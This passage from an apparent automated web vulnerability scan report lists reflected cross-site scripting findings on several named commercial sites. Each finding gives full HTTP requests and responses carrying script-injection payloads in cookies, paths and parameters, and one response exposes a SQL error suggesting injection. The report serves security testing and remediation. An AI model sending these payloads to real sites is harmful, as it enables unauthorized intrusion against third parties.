Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319dc711"><script>alert(1)</script>103b14f1145; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:19 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D1794967%26cid%3D696829%26tc%3D11020308002595319dc711%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E103b14f1145; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:11 GMT;path=/;httponly
Content-Length: 2946


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>GSB Mortgage, Inc. (Grapevine,TX)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO
...[SNIP]...
<frame src="/coupon/d544/544003/index5.html?scid=1794967&cid=696829&tc=11020308002595319dc711"><script>alert(1)</script>103b14f1145&rl_key=266706c08d1e97edf1c0c82556f3d3e7&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0

...[SNIP]...

1.701. http://optimized-by.rubiconproject.com/a/6272/9319/15153-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6272/9319/15153-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8010f"-alert(1)-"9cee6b4b2f1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6272/9319/15153-15.js?cb=0.5483633035328239 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=3;sz=300x250;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1%262119%3D1; ruid=8010f"-alert(1)-"9cee6b4b2f1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6272/9319; rdk2=0; ses2=9319^1; csi2=3191844.js^1^1296750694^1296750694

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:02:22 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6272/9319; expires=Thu, 03-Feb-2011 20:02:22 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Thu, 03-Feb-2011 20:02:22 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9319^1; expires=Fri, 04-Feb-2011 05:59:59 GMT; max-age=46657; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3173810.js^1^1296759742^1296759742; expires=Thu, 10-Feb-2011 19:02:22 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2270

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3173810"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=8010f"-alert(1)-"9cee6b4b2f1\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

1.702. http://optimized-by.rubiconproject.com/a/6272/9319/15153-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6272/9319/15153-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d78"-alert(1)-"0dfb266372e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6272/9319/15153-2.js?cb=0.19099231413565576 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; ruid=67d78"-alert(1)-"0dfb266372e; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1%262119%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:02:08 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=67d78"-alert(1)-"0dfb266372e^1^1296759728^2915161843; expires=Wed, 04-May-2011 19:02:08 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=6272/9319; expires=Thu, 03-Feb-2011 20:02:08 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Thu, 03-Feb-2011 20:02:08 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9319^1; expires=Fri, 04-Feb-2011 05:59:59 GMT; max-age=46671; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=719969.js^1^1296759728^1296759728; expires=Thu, 10-Feb-2011 19:02:08 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2611

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "719969" +
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=67d78"-alert(1)-"0dfb266372e\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

1.703. http://porscheusa.com/911GTS-mosaic [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://porscheusa.com
Path:   /911GTS-mosaic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fc74"><script>alert(1)</script>069d9c26fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 HTTP/1.1
Host: porscheusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu Feb 3 19:15:05 2011
Server: redirector/2.0 (Unix)
Location: http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Moved Temporarily</TITLE>
</HEAD><BODY>
<H1>Moved Temporarily</H1>
The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2">
...[SNIP]...

1.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://porscheusa.com
Path:   /911GTS-mosaic

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed1c"><script>alert(1)</script>60964318e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 HTTP/1.1
Host: porscheusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu Feb 3 19:14:56 2011
Server: redirector/2.0 (Unix)
Location: http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Moved Temporarily</TITLE>
</HEAD><BODY>
<H1>Moved Temporarily</H1>
The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1">
...[SNIP]...

1.705. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.srtk.net
Path:   /www/delivery/rd.php

Issue detail

The value of the trackerid request parameter is copied into the HTML document as plain text between tags. The payload 4e88d<script>alert(1)</script>4dbb23bcccc was submitted in the trackerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /www/delivery/rd.php?bannerid=372&trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc&SR=sr3_43119753_ms&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B232825021%3B56698875%3Bs%3Fhttp%3A%2F%2Fwww.us.hsbc.com%2F1%2F2%2F3%2Fhsbcpremier%2Fprom%2Fnov-10%3Fcode%3DPMD0006263%26WT.srch%3D1%26WT.mc_id%3DHBUS_PMD0006263 HTTP/1.1
Host: s1.srtk.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:23:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://s1.srtk.net/w3c/s1.xml", CP="NON IVAa HISa OTPa OUR DELa IND UNI PUR COM NAV INT"
Set-Cookie: MAXID=22038148057ac3fac5133f97badb01dc; expires=Fri, 03-Feb-2012 16:23:52 GMT; path=/
location: http://ad.doubleclick.net/clk;232825021;56698875;s?http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263
Content-Length: 362
Connection: close
Content-Type: application/x-javascript

SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd<script>
...[SNIP]...

1.706. http://www.feedzilla.com/rss/flash_feed.asp [Cat2 parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedzilla.com
Path:   /rss/flash_feed.asp

Issue detail

The value of the Cat2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c5e4"><script>alert(1)</script>e49c418b94f was submitted in the Cat2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rss/flash_feed.asp?cat=business&Cat2=mortgage2c5e4"><script>alert(1)</script>e49c418b94f HTTP/1.1
Host: www.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:02:42 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Location: http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352

<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET">
...[SNIP]...

1.707. http://www.feedzilla.com/rss/flash_feed.asp [cat parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedzilla.com
Path:   /rss/flash_feed.asp

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4df"><script>alert(1)</script>de2ee12f61a was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rss/flash_feed.asp?cat=business3b4df"><script>alert(1)</script>de2ee12f61a&Cat2=mortgage HTTP/1.1
Host: www.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:02:41 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Location: http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352

<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET">
...[SNIP]...
